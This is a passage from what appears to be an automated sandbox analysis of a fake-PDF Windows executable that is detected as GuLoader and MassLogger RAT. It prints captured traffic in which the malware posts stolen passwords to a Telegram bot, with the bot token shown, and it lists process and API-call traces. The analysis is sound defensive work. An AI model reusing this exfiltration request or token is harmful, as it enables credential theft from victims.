                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1842&rtt_var=712&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1512953&cwnd=162&unsent_bytes=0&cid=8a8482a131993af5&ts=465&x=0"
                                                                                                                                  2024-12-15 17:29:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.449885149.154.167.2204436020C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-15 17:30:05 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1d0431f11147
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-15 17:30:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 30 34 33 31 66 31 31 31 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1d0431f11147Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-15 17:30:06 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Sun, 15 Dec 2024 17:30:06 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-15 17:30:06 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 39 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 32 38 33 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":10952,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734283806,"document":{"file_n


                                                                                                                                  Click to jump to process

                                                                                                                                  Click to jump to process

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:12:27:56
                                                                                                                                  Start date:15/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:484'309 bytes
                                                                                                                                  MD5 hash:E47D302AD20A15E7C4816B5E7B236699
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2618839198.0000000003647000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:12:29:31
                                                                                                                                  Start date:15/12/2024
                                                                                                                                  Path:C:\Users\user\Desktop\SWIFT09181-24_pdf.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:484'309 bytes
                                                                                                                                  MD5 hash:E47D302AD20A15E7C4816B5E7B236699
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2951065563.0000000037A5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:false

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:21.4%
                                                                                                                                    Dynamic/Decrypted Code Coverage:13.9%
                                                                                                                                    Signature Coverage:20.8%
                                                                                                                                    Total number of Nodes:1517
                                                                                                                                    Total number of Limit Nodes:47
                                                                                                                                    execution_graph 4802 402840 4803 402bbf 18 API calls 4802->4803 4805 40284e 4803->4805 4804 402864 4807 405c05 2 API calls 4804->4807 4805->4804 4806 402bbf 18 API calls 4805->4806 4806->4804 4808 40286a 4807->4808 4830 405c2a GetFileAttributesW CreateFileW 4808->4830 4810 402877 4811 402883 GlobalAlloc 4810->4811 4812 40291a 4810->4812 4815 402911 CloseHandle 4811->4815 4816 40289c 4811->4816 4813 402922 DeleteFileW 4812->4813 4814 402935 4812->4814 4813->4814 4815->4812 4831 403258 SetFilePointer 4816->4831 4818 4028a2 4819 403242 ReadFile 4818->4819 4820 4028ab GlobalAlloc 4819->4820 4821 4028bb 4820->4821 4822 4028ef 4820->4822 4823 403027 32 API calls 4821->4823 4824 405cdc WriteFile 4822->4824 4825 4028c8 4823->4825 4826 4028fb GlobalFree 4824->4826 4828 4028e6 GlobalFree 4825->4828 4827 403027 32 API calls 4826->4827 4829 40290e 4827->4829 4828->4822 4829->4815 4830->4810 4831->4818 4832 10001000 4835 1000101b 4832->4835 4842 10001516 4835->4842 4837 10001020 4838 10001024 4837->4838 4839 10001027 GlobalAlloc 4837->4839 4840 1000153d 3 API calls 4838->4840 4839->4838 4841 10001019 4840->4841 4844 1000151c 4842->4844 4843 10001522 4843->4837 4844->4843 4845 1000152e GlobalFree 4844->4845 4845->4837 4846 401cc0 4847 402ba2 18 API calls 4846->4847 4848 401cc7 4847->4848 4849 402ba2 18 API calls 4848->4849 4850 401ccf GetDlgItem 4849->4850 4851 402531 4850->4851 4852 4029c0 4853 402ba2 18 API calls 4852->4853 4854 4029c6 4853->4854 4855 4029f9 4854->4855 4857 40281e 4854->4857 4858 4029d4 4854->4858 4856 406077 18 API calls 4855->4856 4855->4857 4856->4857 4858->4857 4860 405f9c wsprintfW 4858->4860 4860->4857 4199 403c41 4200 403d94 4199->4200 4201 403c59 4199->4201 4203 403de5 4200->4203 4204 403da5 GetDlgItem GetDlgItem 4200->4204 4201->4200 4202 403c65 4201->4202 4206 403c70 SetWindowPos 4202->4206 4207 403c83 4202->4207 4205 403e3f 4203->4205 4213 401389 2 API calls 4203->4213 4208 404119 19 API calls 4204->4208 4209 404165 SendMessageW 4205->4209 4230 403d8f 4205->4230 4206->4207 4210 403ca0 4207->4210 4211 403c88 ShowWindow 4207->4211 4212 403dcf SetClassLongW 4208->4212 4242 403e51 4209->4242 4214 403cc2 4210->4214 4215 403ca8 DestroyWindow 4210->4215 4211->4210 4216 40140b 2 API calls 4212->4216 4217 403e17 4213->4217 4219 403cc7 SetWindowLongW 4214->4219 4220 403cd8 4214->4220 4218 4040c3 4215->4218 4216->4203 4217->4205 4223 403e1b SendMessageW 4217->4223 4229 4040d3 ShowWindow 4218->4229 4218->4230 4219->4230 4221 403d81 4220->4221 4222 403ce4 GetDlgItem 4220->4222 4279 404180 4221->4279 4226 403d14 4222->4226 4227 403cf7 SendMessageW IsWindowEnabled 4222->4227 4223->4230 4224 40140b 2 API calls 4224->4242 4225 4040a4 DestroyWindow EndDialog 4225->4218 4232 403d21 4226->4232 4233 403d68 SendMessageW 4226->4233 4234 403d34 4226->4234 4244 403d19 4226->4244 4227->4226 4227->4230 4229->4230 4231 406077 18 API calls 4231->4242 4232->4233 4232->4244 4233->4221 4237 403d51 4234->4237 4238 403d3c 4234->4238 4236 403d4f 4236->4221 4240 40140b 2 API calls 4237->4240 4241 40140b 2 API calls 4238->4241 4239 404119 19 API calls 4239->4242 4243 403d58 4240->4243 4241->4244 4242->4224 4242->4225 4242->4230 4242->4231 4242->4239 4260 403fe4 DestroyWindow 4242->4260 4270 404119 4242->4270 4243->4221 4243->4244 4276 4040f2 4244->4276 4246 403ecc GetDlgItem 4247 403ee1 4246->4247 4248 403ee9 ShowWindow KiUserCallbackDispatcher 4246->4248 4247->4248 4273 40413b EnableWindow 4248->4273 4250 403f13 EnableWindow 4253 403f27 4250->4253 4251 403f2c GetSystemMenu EnableMenuItem SendMessageW 4252 403f5c SendMessageW 4251->4252 4251->4253 4252->4253 4253->4251 4274 40414e SendMessageW 4253->4274 4275 406055 lstrcpynW 4253->4275 4256 403f8a lstrlenW 4257 406077 18 API calls 4256->4257 4258 403fa0 SetWindowTextW 4257->4258 4259 401389 2 API calls 4258->4259 4259->4242 4260->4218 4261 403ffe CreateDialogParamW 4260->4261 4261->4218 4262 404031 4261->4262 4263 404119 19 API calls 4262->4263 4264 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4263->4264 4265 401389 2 API calls 4264->4265 4266 404082 4265->4266 4266->4230 4267 40408a ShowWindow 4266->4267 4268 404165 SendMessageW 4267->4268 4269 4040a2 4268->4269 4269->4218 4271 406077 18 API calls 4270->4271 4272 404124 SetDlgItemTextW 4271->4272 4272->4246 4273->4250 4274->4253 4275->4256 4277 4040f9 4276->4277 4278 4040ff SendMessageW 4276->4278 4277->4278 4278->4236 4280 404198 GetWindowLongW 4279->4280 4290 404221 4279->4290 4281 4041a9 4280->4281 4280->4290 4282 4041b8 GetSysColor 4281->4282 4283 4041bb 4281->4283 4282->4283 4284 4041c1 SetTextColor 4283->4284 4285 4041cb SetBkMode 4283->4285 4284->4285 4286 4041e3 GetSysColor 4285->4286 4287 4041e9 4285->4287 4286->4287 4288 4041f0 SetBkColor 4287->4288 4289 4041fa 4287->4289 4288->4289 4289->4290 4291 404214 CreateBrushIndirect 4289->4291 4292 40420d DeleteObject 4289->4292 4290->4230 4291->4290 4292->4291 4293 401fc3 4294 401fd5 4293->4294 4304 402087 4293->4304 4316 402bbf 4294->4316 4296 401423 25 API calls 4302 4021e1 4296->4302 4298 402bbf 18 API calls 4299 401fe5 4298->4299 4300 401ffb LoadLibraryExW 4299->4300 4301 401fed GetModuleHandleW 4299->4301 4303 40200c 4300->4303 4300->4304 4301->4300 4301->4303 4322 40649a WideCharToMultiByte 4303->4322 4304->4296 4307 402056 4311 4051b4 25 API calls 4307->4311 4308 40201d 4309 402025 4308->4309 4310 40203c 4308->4310 4367 401423 4309->4367 4325 10001759 4310->4325 4313 40202d 4311->4313 4313->4302 4314 402079 FreeLibrary 4313->4314 4314->4302 4317 402bcb 4316->4317 4318 406077 18 API calls 4317->4318 4319 402bec 4318->4319 4320 401fdc 4319->4320 4321 4062e9 5 API calls 4319->4321 4320->4298 4321->4320 4323 4064c4 GetProcAddress 4322->4323 4324 402017 4322->4324 4323->4324 4324->4307 4324->4308 4326 10001789 4325->4326 4370 10001b18 4326->4370 4328 10001790 4329 100018a6 4328->4329 4330 100017a1 4328->4330 4331 100017a8 4328->4331 4329->4313 4419 10002286 4330->4419 4402 100022d0 4331->4402 4336 1000180c 4342 10001812 4336->4342 4343 1000184e 4336->4343 4337 100017ee 4432 100024a9 4337->4432 4338 100017d7 4352 100017cd 4338->4352 4429 10002b5f 4338->4429 4339 100017be 4341 100017c4 4339->4341 4346 100017cf 4339->4346 4341->4352 4413 100028a4 4341->4413 4348 100015b4 3 API calls 4342->4348 4344 100024a9 10 API calls 4343->4344 4350 10001840 4344->4350 4345 100017f4 4443 100015b4 4345->4443 4423 10002645 4346->4423 4354 10001828 4348->4354 4358 10001895 4350->4358 4454 1000246c 4350->4454 4352->4336 4352->4337 4357 100024a9 10 API calls 4354->4357 4356 100017d5 4356->4352 4357->4350 4358->4329 4362 1000189f GlobalFree 4358->4362 4362->4329 4364 10001881 4364->4358 4458 1000153d wsprintfW 4364->4458 4365 1000187a FreeLibrary 4365->4364 4368 4051b4 25 API calls 4367->4368 4369 401431 4368->4369 4369->4313 4461 1000121b GlobalAlloc 4370->4461 4372 10001b3c 4462 1000121b GlobalAlloc 4372->4462 4374 10001d7a GlobalFree GlobalFree GlobalFree 4375 10001d97 4374->4375 4392 10001de1 4374->4392 4376 100020ee 4375->4376 4385 10001dac 4375->4385 4375->4392 4378 10002110 GetModuleHandleW 4376->4378 4376->4392 4377 10001c1d GlobalAlloc 4395 10001b47 4377->4395 4380 10002121 LoadLibraryW 4378->4380 4381 10002136 4378->4381 4379 10001c86 GlobalFree 4379->4395 4380->4381 4380->4392 4469 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4381->4469 4382 10001c68 lstrcpyW 4383 10001c72 lstrcpyW 4382->4383 4383->4395 4385->4392 4465 1000122c 4385->4465 4386 10002188 4388 10002195 lstrlenW 4386->4388 4386->4392 4387 10002048 4387->4392 4396 10002090 lstrcpyW 4387->4396 4470 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4388->4470 4392->4328 4393 10002148 4393->4386 4401 10002172 GetProcAddress 4393->4401 4394 100021af 4394->4392 4395->4374 4395->4377 4395->4379 4395->4382 4395->4383 4395->4387 4395->4392 4397 10001cc4 4395->4397 4398 10001f37 GlobalFree 4395->4398 4400 1000122c 2 API calls 4395->4400 4468 1000121b GlobalAlloc 4395->4468 4396->4392 4397->4395 4463 1000158f GlobalSize GlobalAlloc 4397->4463 4398->4395 4400->4395 4401->4386 4410 100022e8 4402->4410 4404 10002415 GlobalFree 4408 100017ae 4404->4408 4404->4410 4405 100023d3 lstrlenW 4405->4404 4409 100023d1 4405->4409 4406 100023ba GlobalAlloc 4406->4409 4407 1000238f GlobalAlloc WideCharToMultiByte 4407->4404 4408->4338 4408->4339 4408->4352 4409->4404 4476 100025d9 4409->4476 4410->4404 4410->4405 4410->4406 4410->4407 4411 1000122c GlobalAlloc lstrcpynW 4410->4411 4472 100012ba 4410->4472 4411->4410 4415 100028b6 4413->4415 4414 1000295b VirtualAlloc 4416 10002979 4414->4416 4415->4414 4417 10002a75 4416->4417 4418 10002a6a GetLastError 4416->4418 4417->4352 4418->4417 4420 10002296 4419->4420 4421 100017a7 4419->4421 4420->4421 4422 100022a8 GlobalAlloc 4420->4422 4421->4331 4422->4420 4427 10002661 4423->4427 4424 100026b2 GlobalAlloc 4428 100026d4 4424->4428 4425 100026c5 4426 100026ca GlobalSize 4425->4426 4425->4428 4426->4428 4427->4424 4427->4425 4428->4356 4430 10002b6a 4429->4430 4431 10002baa GlobalFree 4430->4431 4479 1000121b GlobalAlloc 4432->4479 4434 10002530 StringFromGUID2 4440 100024b3 4434->4440 4435 10002541 lstrcpynW 4435->4440 4436 1000250b MultiByteToWideChar 4436->4440 4437 10002571 GlobalFree 4437->4440 4438 10002554 wsprintfW 4438->4440 4439 100025ac GlobalFree 4439->4345 4440->4434 4440->4435 4440->4436 4440->4437 4440->4438 4440->4439 4441 10001272 2 API calls 4440->4441 4480 100012e1 4440->4480 4441->4440 4484 1000121b GlobalAlloc 4443->4484 4445 100015ba 4446 100015c7 lstrcpyW 4445->4446 4448 100015e1 4445->4448 4449 100015fb 4446->4449 4448->4449 4450 100015e6 wsprintfW 4448->4450 4451 10001272 4449->4451 4450->4449 4452 100012b5 GlobalFree 4451->4452 4453 1000127b GlobalAlloc lstrcpynW 4451->4453 4452->4350 4453->4452 4455 1000247a 4454->4455 4456 10001861 4454->4456 4455->4456 4457 10002496 GlobalFree 4455->4457 4456->4364 4456->4365 4457->4455 4459 10001272 2 API calls 4458->4459 4460 1000155e 4459->4460 4460->4358 4461->4372 4462->4395 4464 100015ad 4463->4464 4464->4397 4471 1000121b GlobalAlloc 4465->4471 4467 1000123b lstrcpynW 4467->4392 4468->4395 4469->4393 4470->4394 4471->4467 4473 100012c1 4472->4473 4474 1000122c 2 API calls 4473->4474 4475 100012df 4474->4475 4475->4410 4477 100025e7 VirtualAlloc 4476->4477 4478 1000263d 4476->4478 4477->4478 4478->4409 4479->4440 4481 100012ea 4480->4481 4482 1000130c 4480->4482 4481->4482 4483 100012f0 lstrcpyW 4481->4483 4482->4440 4483->4482 4484->4445 4861 4016c4 4862 402bbf 18 API calls 4861->4862 4863 4016ca GetFullPathNameW 4862->4863 4864 4016e4 4863->4864 4865 401706 4863->4865 4864->4865 4868 406398 2 API calls 4864->4868 4866 40171b GetShortPathNameW 4865->4866 4867 402a4c 4865->4867 4866->4867 4869 4016f6 4868->4869 4869->4865 4871 406055 lstrcpynW 4869->4871 4871->4865 4872 4014cb 4873 4051b4 25 API calls 4872->4873 4874 4014d2 4873->4874 4875 40194e 4876 402bbf 18 API calls 4875->4876 4877 401955 lstrlenW 4876->4877 4878 402531 4877->4878 4879 4027ce 4880 4027d6 4879->4880 4881 4027da FindNextFileW 4880->4881 4884 4027ec 4880->4884 4882 402833 4881->4882 4881->4884 4885 406055 lstrcpynW 4882->4885 4885->4884 4682 401754 4683 402bbf 18 API calls 4682->4683 4684 40175b 4683->4684 4685 405c59 2 API calls 4684->4685 4686 401762 4685->4686 4687 405c59 2 API calls 4686->4687 4687->4686 4886 401d56 GetDC GetDeviceCaps 4887 402ba2 18 API calls 4886->4887 4888 401d74 MulDiv ReleaseDC 4887->4888 4889 402ba2 18 API calls 4888->4889 4890 401d93 4889->4890 4891 406077 18 API calls 4890->4891 4892 401dcc CreateFontIndirectW 4891->4892 4893 402531 4892->4893 4894 401a57 4895 402ba2 18 API calls 4894->4895 4896 401a5d 4895->4896 4897 402ba2 18 API calls 4896->4897 4898 401a05 4897->4898 4899 4014d7 4900 402ba2 18 API calls 4899->4900 4901 4014dd Sleep 4900->4901 4903 402a4c 4901->4903 4904 40155b 4905 4029f2 4904->4905 4908 405f9c wsprintfW 4905->4908 4907 4029f7 4908->4907 4784 401ddc 4785 402ba2 18 API calls 4784->4785 4786 401de2 4785->4786 4787 402ba2 18 API calls 4786->4787 4788 401deb 4787->4788 4789 401df2 ShowWindow 4788->4789 4790 401dfd EnableWindow 4788->4790 4791 402a4c 4789->4791 4790->4791 4909 40385c 4910 403867 4909->4910 4911 40386b 4910->4911 4912 40386e GlobalAlloc 4910->4912 4912->4911 4913 4022df 4914 402bbf 18 API calls 4913->4914 4915 4022ee 4914->4915 4916 402bbf 18 API calls 4915->4916 4917 4022f7 4916->4917 4918 402bbf 18 API calls 4917->4918 4919 402301 GetPrivateProfileStringW 4918->4919 4920 401bdf 4921 402ba2 18 API calls 4920->4921 4922 401be6 4921->4922 4923 402ba2 18 API calls 4922->4923 4924 401bf0 4923->4924 4925 401c00 4924->4925 4926 402bbf 18 API calls 4924->4926 4927 401c10 4925->4927 4928 402bbf 18 API calls 4925->4928 4926->4925 4929 401c1b 4927->4929 4930 401c5f 4927->4930 4928->4927 4932 402ba2 18 API calls 4929->4932 4931 402bbf 18 API calls 4930->4931 4933 401c64 4931->4933 4934 401c20 4932->4934 4935 402bbf 18 API calls 4933->4935 4936 402ba2 18 API calls 4934->4936 4937 401c6d FindWindowExW 4935->4937 4938 401c29 4936->4938 4941 401c8f 4937->4941 4939 401c31 SendMessageTimeoutW 4938->4939 4940 401c4f SendMessageW 4938->4940 4939->4941 4940->4941 4942 401960 4943 402ba2 18 API calls 4942->4943 4944 401967 4943->4944 4945 402ba2 18 API calls 4944->4945 4946 401971 4945->4946 4947 402bbf 18 API calls 4946->4947 4948 40197a 4947->4948 4949 40198e lstrlenW 4948->4949 4950 4019ca 4948->4950 4951 401998 4949->4951 4951->4950 4955 406055 lstrcpynW 4951->4955 4953 4019b3 4953->4950 4954 4019c0 lstrlenW 4953->4954 4954->4950 4955->4953 4956 401662 4957 402bbf 18 API calls 4956->4957 4958 401668 4957->4958 4959 406398 2 API calls 4958->4959 4960 40166e 4959->4960 4961 4019e4 4962 402bbf 18 API calls 4961->4962 4963 4019eb 4962->4963 4964 402bbf 18 API calls 4963->4964 4965 4019f4 4964->4965 4966 4019fb lstrcmpiW 4965->4966 4967 401a0d lstrcmpW 4965->4967 4968 401a01 4966->4968 4967->4968 4485 4025e5 4499 402ba2 4485->4499 4487 40263a ReadFile 4494 4025f4 4487->4494 4498 40272d 4487->4498 4488 4026d3 4488->4494 4488->4498 4502 405d0b SetFilePointer 4488->4502 4489 405cad ReadFile 4489->4494 4491 40267a MultiByteToWideChar 4491->4494 4492 40272f 4511 405f9c wsprintfW 4492->4511 4494->4487 4494->4488 4494->4489 4494->4491 4494->4492 4495 4026a0 SetFilePointer MultiByteToWideChar 4494->4495 4496 402740 4494->4496 4494->4498 4495->4494 4497 402761 SetFilePointer 4496->4497 4496->4498 4497->4498 4500 406077 18 API calls 4499->4500 4501 402bb6 4500->4501 4501->4494 4503 405d27 4502->4503 4504 405d43 4502->4504 4505 405cad ReadFile 4503->4505 4504->4488 4506 405d33 4505->4506 4506->4504 4507 405d74 SetFilePointer 4506->4507 4508 405d4c SetFilePointer 4506->4508 4507->4504 4508->4507 4509 405d57 4508->4509 4510 405cdc WriteFile 4509->4510 4510->4504 4511->4498 4969 401e66 4970 402bbf 18 API calls 4969->4970 4971 401e6c 4970->4971 4972 4051b4 25 API calls 4971->4972 4973 401e76 4972->4973 4974 405735 2 API calls 4973->4974 4975 401e7c 4974->4975 4976 401edb CloseHandle 4975->4976 4977 401e8c WaitForSingleObject 4975->4977 4978 40281e 4975->4978 4976->4978 4979 401e9e 4977->4979 4980 401eb0 GetExitCodeProcess 4979->4980 4981 406467 2 API calls 4979->4981 4982 401ec2 4980->4982 4983 401ecd 4980->4983 4984 401ea5 WaitForSingleObject 4981->4984 4986 405f9c wsprintfW 4982->4986 4983->4976 4984->4979 4986->4983 4521 401767 4522 402bbf 18 API calls 4521->4522 4523 40176e 4522->4523 4524 401796 4523->4524 4525 40178e 4523->4525 4562 406055 lstrcpynW 4524->4562 4561 406055 lstrcpynW 4525->4561 4528 401794 4532 4062e9 5 API calls 4528->4532 4529 4017a1 4530 405a09 3 API calls 4529->4530 4531 4017a7 lstrcatW 4530->4531 4531->4528 4539 4017b3 4532->4539 4533 406398 2 API calls 4533->4539 4534 4017ef 4535 405c05 2 API calls 4534->4535 4535->4539 4537 4017c5 CompareFileTime 4537->4539 4538 401885 4540 4051b4 25 API calls 4538->4540 4539->4533 4539->4534 4539->4537 4539->4538 4542 406055 lstrcpynW 4539->4542 4547 406077 18 API calls 4539->4547 4555 40579a MessageBoxIndirectW 4539->4555 4558 40185c 4539->4558 4560 405c2a GetFileAttributesW CreateFileW 4539->4560 4543 40188f 4540->4543 4541 4051b4 25 API calls 4559 401871 4541->4559 4542->4539 4544 403027 32 API calls 4543->4544 4545 4018a2 4544->4545 4546 4018b6 SetFileTime 4545->4546 4548 4018c8 CloseHandle 4545->4548 4546->4548 4547->4539 4549 4018d9 4548->4549 4548->4559 4550 4018f1 4549->4550 4551 4018de 4549->4551 4552 406077 18 API calls 4550->4552 4553 406077 18 API calls 4551->4553 4554 4018f9 4552->4554 4556 4018e6 lstrcatW 4553->4556 4557 40579a MessageBoxIndirectW 4554->4557 4555->4539 4556->4554 4557->4559 4558->4541 4558->4559 4560->4539 4561->4528 4562->4529 4987 404267 lstrlenW 4988 404286 4987->4988 4989 404288 WideCharToMultiByte 4987->4989 4988->4989 4990 401ee9 4991 402bbf 18 API calls 4990->4991 4992 401ef0 4991->4992 4993 406398 2 API calls 4992->4993 4994 401ef6 4993->4994 4995 401f07 4994->4995 4997 405f9c wsprintfW 4994->4997 4997->4995 4998 100018a9 4999 100018cc 4998->4999 5000 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4999->5000 5001 100018ff GlobalFree 4999->5001 5002 10001272 2 API calls 5000->5002 5001->5000 5003 10001a87 GlobalFree GlobalFree 5002->5003 5004 4021ea 5005 402bbf 18 API calls 5004->5005 5006 4021f0 5005->5006 5007 402bbf 18 API calls 5006->5007 5008 4021f9 5007->5008 5009 402bbf 18 API calls 5008->5009 5010 402202 5009->5010 5011 406398 2 API calls 5010->5011 5012 40220b 5011->5012 5013 40221c lstrlenW lstrlenW 5012->5013 5014 40220f 5012->5014 5016 4051b4 25 API calls 5013->5016 5015 4051b4 25 API calls 5014->5015 5018 402217 5014->5018 5015->5018 5017 40225a SHFileOperationW 5016->5017 5017->5014 5017->5018 5019 40156b 5020 401584 5019->5020 5021 40157b ShowWindow 5019->5021 5022 401592 ShowWindow 5020->5022 5023 402a4c 5020->5023 5021->5020 5022->5023 5024 40456d 5025 4045a3 5024->5025 5026 40457d 5024->5026 5027 404180 8 API calls 5025->5027 5028 404119 19 API calls 5026->5028 5029 4045af 5027->5029 5030 40458a SetDlgItemTextW 5028->5030 5030->5025 5031 40226e 5032 402275 5031->5032 5034 402288 5031->5034 5033 406077 18 API calls 5032->5033 5035 402282 5033->5035 5036 40579a MessageBoxIndirectW 5035->5036 5036->5034 5037 4014f1 SetForegroundWindow 5038 402a4c 5037->5038 5039 401673 5040 402bbf 18 API calls 5039->5040 5041 40167a 5040->5041 5042 402bbf 18 API calls 5041->5042 5043 401683 5042->5043 5044 402bbf 18 API calls 5043->5044 5045 40168c MoveFileW 5044->5045 5046 40169f 5045->5046 5052 401698 5045->5052 5048 406398 2 API calls 5046->5048 5050 4021e1 5046->5050 5047 401423 25 API calls 5047->5050 5049 4016ae 5048->5049 5049->5050 5051 405ef6 38 API calls 5049->5051 5051->5052 5052->5047 5053 4052f3 5054 405314 GetDlgItem GetDlgItem 